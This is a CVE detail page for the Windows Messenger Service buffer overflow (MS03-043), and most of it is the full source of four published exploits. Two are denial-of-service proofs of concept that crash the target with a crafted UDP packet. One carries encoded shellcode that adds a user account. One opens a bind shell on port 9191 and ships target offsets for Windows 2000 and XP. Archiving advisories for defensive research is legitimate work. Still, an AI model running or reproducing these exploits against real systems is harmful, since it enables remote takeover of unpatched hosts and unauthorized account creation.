CVE-2003-0717 : Detail

CVE-2003-0717

95.29%V3
Network
2003-10-17
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Messenger Service for Windows NT through Server 2003 does not properly verify the length of the message, which allows remote attackers to execute arbitrary code via a buffer overflow attack.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 385

Publication date : 2004-08-07 22h00 +00:00
Author : VeNoMouS
EDB Verified : Yes

/* Mon Oct 20 14:26:55 NZDT 2003 Re-written By VeNoMouS to be ported to linux, and tidy it up a little. This was only like a 5 minute port but it works and has been tested. venomgen-x.co.nz <mailto:venomgen-x.co.nz> greets to str0ke and defy DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4. "The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, but is then copied to a buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks and overflow the fixed size buffer. Credits go to LSD :) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> // Packet format found thanks to a bit a sniffing static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // 40 : unique id over 16 bytes ? "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // 74 : fields length "\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff" // 0 : field length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // 8 : field length int usage(char *name) { printf("Proof of Concept for Windows Messenger Service Overflow..\n"); printf("- Originally By Hanabishi Recca - reccamail.ru\n\n <mailto:reccamail.ru\n\n> "); printf("- Ported to linux by VeNoMouS..\n"); printf("- venomgen-x.co.nz\n\n\n <mailto:venomgen-x.co.nz\n\n\n> "); printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n",name); printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n"); printf("-s <src netbios name>\n"); return 1; } int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; char from[57],machine[57],c; char body[4096] = "*** MESSAGE ***"; if(argc <= 2) { usage(argv[0]); exit(0); } while ((c = getopt (argc, argv, "d:i:s:h")) != EOF) switch(c) { case 'd': strncpy(machine,optarg,sizeof(machine)); printf("Machine is %s\n",machine); break; case 'i': memset(&addr, 0,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(optarg); addr.sin_port = htons(135); break; case 's': strncpy(from,optarg,sizeof(from)); break; case 'h': usage(argv[0]); exit(0); break; } // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); exit(0); } if(!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(0); } if(!strlen(from)) strcpy(from,"tolazytotype"); memset(packet,0, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body),packet_size, fields_size); if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 ) { perror("Error socket() - "); exit(0); } if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("Error sendto() - "); exit(0); } exit(0); } // milw0rm.com [2004-08-08]
Exploit Database EDB-ID : 111

Publication date : 2003-10-17 22h00 +00:00
Author : LSD-PLaNET
EDB Verified : Yes

/* DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4. "The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, but is then copied to a buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks and overflow the fixed size buffer. Credits go to LSD :) */ #include <stdio.h> #include <winsock.h> #include <string.h> #include <time.h> // Packet format found thanks to a bit a sniffing static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ? "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // @74 : fields length "\x00\x00"; // Exploit downloaded on www.k-otik.com unsigned char field_header[] = "\xff\xff\xff\xff" // @0 : field length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // @8 : field length int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "*** MESSAGE ***"; WSADATA wsaData; WSAStartup(0x0202, &wsaData); ZeroMemory(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr("192.168.186.3"); addr.sin_port = htons(135); ZeroMemory(packet, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size); /* for (i = 0; i < packet_size; i++) { if (i && ((i & 1) == 0)) fprintf(stdout, " "); if (i && ((i & 15) == 0)) fprintf(stdout, "\n"); fprintf(stdout, "%02x", packet[i]); } fprintf(stdout, "\n"); */ if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) exit(EXIT_FAILURE); if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) exit(EXIT_FAILURE); /* if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1) exit(EXIT_FAILURE); */ exit(EXIT_SUCCESS); } // milw0rm.com [2003-10-18]
Exploit Database EDB-ID : 135

Publication date : 2003-12-15 23h00 +00:00
Author : MrNice
EDB Verified : Yes

/*******************************************************************/ /* [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt] */ /* --------------------------------------------------------------- */ /* */ /* This Sploit use the unhandledexceptionfilter to redirect */ /* the execution. When overflow occur we have : */ /* */ /* mov eax,esi+8 */ /* mov ecx,esi+Ch */ /* mov dword ptr ds:[ecx],eax */ /* */ /* so we control ecx and edx and we can write 4 bytes */ /* where we want. */ /* If we try to write in a not writable memory zone, an */ /* excepetion is lauched and unhandledexceptionfilter too. */ /* */ /* A part of unhandledexceptionfilter : */ /* */ /* mov eax, dword_0_77ECF44C(=where) */ /* cmp eax, ebx */ /* jz short loc_0_77EA734C */ /* push esi */ /* call eax */ /* */ /* So we write the "WHAT"(=jmp esi+4Ch) at */ /* the "WHERE"(=77EA734C here) and when the exception occur */ /* the unhandledexceptionfilter is lauched so when call eax */ /* occur, it execute our code. */ /* */ /* Thx Kotik who coded the proof of concept,and Metasploit */ /* for Shellcode and last but not least kralor,Scurt from Crpt */ /* */ /* Tested on win2k FR SP0 */ /* */ /* */ /*******************************************************************/ #ifdef _WIN32 #include <winsock.h> #include <windows.h> #pragma comment (lib,"ws2_32") #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #include <string.h> #endif static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff" "\x00\x00\x00\x00" "\xff\xff\xff\xff"; unsigned char ShellCode[] = // XorDecode 23 bytes "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" // AddUser:X Pass:X "\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55" "\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe" "\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe" "\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f" "\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5" "\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7" "\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96" "\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff" "\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f" "\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7" "\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf" "\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82" "\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a" "\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e" "\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97" "\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae" "\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77" "\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92" "\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96"; int main(int argc,char *argv[]) { int i, packet_size, fields_size, s,sp; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "*** MESSAGE ***"; #ifdef _WIN32 WSADATA wsaData; #endif if(argc<2) { printf("\t [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n"); printf("\t\t www.coromputer.net && Undernet #coromputer\n"); printf("---------------------------------------------------------------\n"); printf("Tested on Windows 2000 French Sp0\n\n"); printf("Downloaded from www.K-OTik.com\n"); printf("Syntax : %s <ip>\n",argv[0]); return -1; } #ifdef _WIN32 if(WSAStartup(0x101,&wsaData)) { printf("error: unable to load winsock.\n"); return -1; } #endif memset(&addr,0x00,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(argv[1]); addr.sin_port = htons(135); memset(packet,0x00,sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 printf("Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[2263]=(char)0x90; body[2264]=(char)0x90; body[2265]=(char)0x90; body[2266]=(char)0x90; body[2267]=(char)0x90; body[2268]=(char)0x90; //jmp 8 bytes plus loing body[2269]=(char)0xeb; body[2270]=(char)0x08; //WHAT CRYPTSVC.dll Win2k sp0 FRENCH body[2271]=(char)0x48; body[2272]=(char)0x65; body[2273]=(char)0x87; body[2274]=(char)0x76; //WHERE win2k sp0 FRENCH body[2275]=(char)0x4C; body[2276]=(char)0xF4; body[2277]=(char)0xEC; body[2278]=(char)0x77; for(i=2279;i<2606;i++) body[i]=ShellCode[i-2279]; body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size); if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { printf("error: unable to create socket\n"); return -1; } if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) { printf("error: unable to send packet\n"); return -1; } return 0; } // milw0rm.com [2003-12-16]
Exploit Database EDB-ID : 23247

Publication date : 2003-10-24 22h00 +00:00
Author : Adik
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/8826/info Microsoft Windows Messenger Service is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of messages before they are passed to an internal buffer. Exploitation could result in a denial of service or in execution of malicious code in Local System context, potentially allowing for full system compromise. /************************************************************************************ Exploit for Microsoft Windows Messenger Heap Overflow (MS03-043) based on PoC DoS by [email protected] by Adik < netmaniac [at] hotmail.kg > http://netninja.to.kg Binds command shell on port 9191 Tested on Windows XP Professional SP1 English version Windows 2000 Professional SP3 English version access violation -> unhandledexceptionfilter -> -> call [esi+48h]/call [edi+6ch] (win2kSP3/WinXPSP1) -> longjmp -> shellcode attach debugger and c how it flows :) worked fine for me -[25/Oct/2003]- ************************************************************************************/ #include <stdio.h> #include <winsock.h> #include <string.h> #include <time.h> #pragma comment(lib,"ws2_32") #define VER "0.7" /**************** bind shellcode spawns shell on port 9191 ************************/ unsigned char kyrgyz_bind_code[] = { 0xEB,0x03,0x5D,0xEB,0x05,0xE8,0xF8,0xFF,0xFF,0xFF,0x8B,0xC5,0x83,0xC0,0x11,0x33,0xC9,0x66,0xB9, 0xC9,0x01,0x80,0x30,0x88,0x40,0xE2,0xFA, 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAB, 0x6F, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88 }; int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH); int main(int argc,char *argv[]) { int sockUDP,ver,c, packetsz,cnt; unsigned char packet[8192]; struct sockaddr_in targetUDP; WSADATA wsaData; struct { char os[30]; DWORD SEH; DWORD JMP; } targetOS[] = { { "Windows 2000 SP 3 (en)", 0x77ee044c, // unhandledexceptionfilter pointer 0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e }, { "Windows XP SP 1 (en)", 0x77ed73b4, 0x7804bf52 //rpcrt4.dll call [edi+6c] }/*, { //not tested "Windows XP SP 0 (en)", 0x77ed63b4, 0x7802ff3d //rpcrt4 call [edi+6c] }*/ }; printf("\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n" " by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER); if(argc < 3) { printf(" Target OS version:\n\n"); for(c=0;c<(sizeof(targetOS)/sizeof(targetOS[0]));c++) printf(" [%d]\t%s\n",c,targetOS[c].os); printf("\n Usage: %s [TargetIP] [ver: 0 | 1]\n" " eg: msgr.exe 192.168.63.130 0\n",argv[0]); return 1; } ver = atoi(argv[2]); printf("[*] Target: \t IP: %s\t OS: %s\n" "[*] UEF: \t 0x%x\n" "[*] JMP: \t 0x%x\n\n", argv[1],targetOS[ver].os, targetOS[ver].SEH, targetOS[ver].JMP); WSAStartup(0x0202, &wsaData); printf("[*] WSAStartup initialized...\n"); ZeroMemory(&targetUDP, sizeof(targetUDP)); targetUDP.sin_family = AF_INET; targetUDP.sin_addr.s_addr = inet_addr(argv[1]); targetUDP.sin_port = htons(135); packetsz = PreparePacket(packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH); if ((sockUDP = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { printf("[x] Socket not initialized! Exiting...\n"); return 1; } printf("[*] Socket initialized...\n"); printf("[*] Injecting packet into a remote process...\n"); if (sendto(sockUDP, packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1) { printf("[x] Failed to inject packet! Exiting...\n"); return 1; } else printf("[*] Packet injected...\n"); printf("[i] Try connecting to %s:9191\n\n",argv[1]); return 0; } /************************************************************************************/ int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH) { static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc\xff\xff\xff\xff\x42\x69\x73\x68\x6b\x65\x6b\x32" "\x30\x30\x33\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff\x00\x00\x00\x00" "\xff\xff\xff\xff"; int packet_size,i,fields_size; char from[] = "NETMANIAC"; char machine[] = "ADIK"; char longjmp[] ="\x90\x90\x90\x90\x90" "\xEB\x03\x58\xEB\x05\xE8\xF8\xFF\xFF\xFF" "\xB9\xFF\xFF\xFF\xFF\x81\xE9\x7F\xEE\xFF" "\xFF\x2B\xC1\xFF\xE0"; char shortjmp[] ="\x90\x90\x90\x90\xEB\x10\x90\x90\x90\x90\x90\x90"; char body[5000] = "*** MESSAGE ***";//4096 ZeroMemory(packet, sizeofpacket); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; memset(body, 0x90, 2296); memcpy(&body[500],kyrgyz_bind_code,sizeof(kyrgyz_bind_code)); memset(&body[2296],0x14,1800); memcpy(&body[2296+1110],shortjmp,sizeof(shortjmp)); *(DWORD *)&body[2296+1121] = Jmp; *(DWORD *)&body[2296+1125] = SEH; memcpy(&body[2296+1129],longjmp,sizeof(longjmp)-1); fprintf(stdout, "[*] Msg body size: %d\n", 3656 - packet_size + sizeof(packet_header) - sizeof(field_header)); body[3656 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; return packet_size; } /************************************************************************************/

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

